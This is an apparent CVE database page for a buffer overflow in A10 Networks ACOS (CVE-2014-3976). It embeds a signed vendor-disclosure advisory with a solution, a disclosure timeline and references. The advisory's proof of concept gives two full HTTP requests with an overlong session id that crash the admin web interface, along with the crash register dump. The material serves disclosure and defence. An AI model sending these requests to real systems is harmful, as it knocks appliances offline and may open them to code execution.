CVE-2014-3976
Description
Buffer overflow in A10 Networks Advanced Core Operating System (ACOS) before 2.7.0-p6 and 2.7.1 before 2.7.1-P1_55 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long session id in the URI to sys_reboot.html. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
A10 Networks ACOS 2.7.0-P2 (Build 53) - Buffer Overflow (PoC)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== Details ===
Advisory:
http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax/
Affected Product: ACOS
Version: 2.7.0-P2(build: 53) (older versions may be affected too)
(Tested on SoftAX[2])
=== Executive Summary ===
Using a specially crafted HTTP request to the administration web server,
it is possible to exploit a lack in the user input validation.
Successful exploitation of the vulnerability may result in remote code
execution. Unsuccessful exploitation of the vulnerability may result in
a Denial of Service of the administrative interface.
=== Proof of Concept ===
Submitting arbitrary input in the HTTP request it?s possible to cause a
buffer overflow. If you provide an overly long ?session id? in the
request, the web server crashes. To reproduce the crash you can send one
of the following requests to the web server:
<HTTPREQ1>
GET
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
</HTTPREQ1>
<HTTPREQ2>
GET
/US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html
HTTP/1.1
Host: 192.168.1.210
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
<HTTPREQ2>
Once the crash occurs the following is the registers state of the SoftAX
appliance:
<REGSTATE>
rax 0ร0 0
rbx 0x1e30300 31654656
rcx 0ร6 6
rdx 0xffffffff 4294967295
rsi 0xcac18f12 3401682706
rdi 0ร4141414141414141 4702111234474983745
rbp 0ร4141414141414141 0ร4141414141414141
rsp 0x7fffbdf9b400 0x7fffbdf9b400
r8 0ร2000 8192
r9 0ร20 32
r10 0ร0 0
r11 0x7f10b4cec180 139709729653120
r12 0ร0 0
r13 0x1e30318 31654680
r14 0x1e30300 31654656
r15 0x1e33b58 31669080
rip 0ร524149 0ร524149
eflags 0ร10246 [ PF ZF IF RF ]
cs 0ร33 51
ss 0x2b 43
ds 0ร0 0
es 0ร0 0
fs 0ร0 0
gs 0ร0 0
fctrl 0x37f 895
fstat 0ร0 0
ftag 0xffff 65535
fiseg 0ร0 0
fioff 0ร0 0
foseg 0ร0 0
fooff 0ร0 0
fop 0ร0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
</REGSTATE>
=== Solution ===
To fix the A10 Networks remote Buffer Overflow you have to upgrade at
least to version 2.7.0-p6
=== Disclosure Timeline ===
2013-05-11 ? A10 Networks remote Buffer Overflow discovered
2013-05-28 ? Initial vendor notification
2013-05-30 ? The vendor acknowledge the vulnerability (bug 128069 )
2014-03-28 ? The vendor fixed the vulnerability[3]
2014-04-02 ? Public advisory
=== Discovered by ===
Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l
=== References ===
[1] http://www.a10networks.com/about/technology_platform_acos.php
[2] http://www.a10networks.com/glossary/SoftAX.php
[3]
https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf
- --
Francesco Perna
Quantum Leap SRL
Sede Legale: Via Colle Scorrano n.5 65100 Pescara (PE)
Sede Operativa: Circonvallazione Cornelia n. 125, 00165 Roma (RM)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQEcBAEBAgAGBQJTO7mWAAoJEPBLO12s/SuDKi8H/A+X4zIfkcwID4zTtbx7unnD
m48/DAVNQpVLBEAWYnu7a4I98FO4gtbHn2OkQOF5beweK6uDLQMbxrzbkufgisik
o10n8xbsa72GsPwadNxpMEtbLozmcjH5lyXPasfQ3OZkaxptesJJbTOGGoDx5M7t
Py0X+iBkoqqCZO5wlvWsFg2cwgjw5hexXsj4qPTEPrsILvU1bhRO46Ky7Zf1roZ+
jtSK9WyMAtiEnpW9N/srjl71vmu9T8Bkpg8iaffq6De7DKbB0aF8x6Jx9EwAkbI5
M8dBDIve6mbwjlWIBmvMBQxiVuXUSUNf0G6gwq++i0bPn/11m1C1XkODsJXJHhk=
=9BkH
-----END PGP SIGNATURE-----
References
- http://osvdb.org/show/osvdb/105354
- http://packetstormsecurity.com/files/125979/A10-Networks-ACOS-2.7.0-P2-Buffer-Overflow.html
- http://seclists.org/fulldisclosure/2014/Apr/16
- http://secunia.com/advisories/57640
- http://www.exploit-db.com/exploits/32702
- http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax
- http://www.securityfocus.com/bid/66588
- http://osvdb.org/show/osvdb/105354
- http://packetstormsecurity.com/files/125979/A10-Networks-ACOS-2.7.0-P2-Buffer-Overflow.html
- http://seclists.org/fulldisclosure/2014/Apr/16
- http://secunia.com/advisories/57640
- http://www.exploit-db.com/exploits/32702
- http://www.quantumleap.it/a10-networks-remote-buffer-overflow-softax
- http://www.securityfocus.com/bid/66588
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.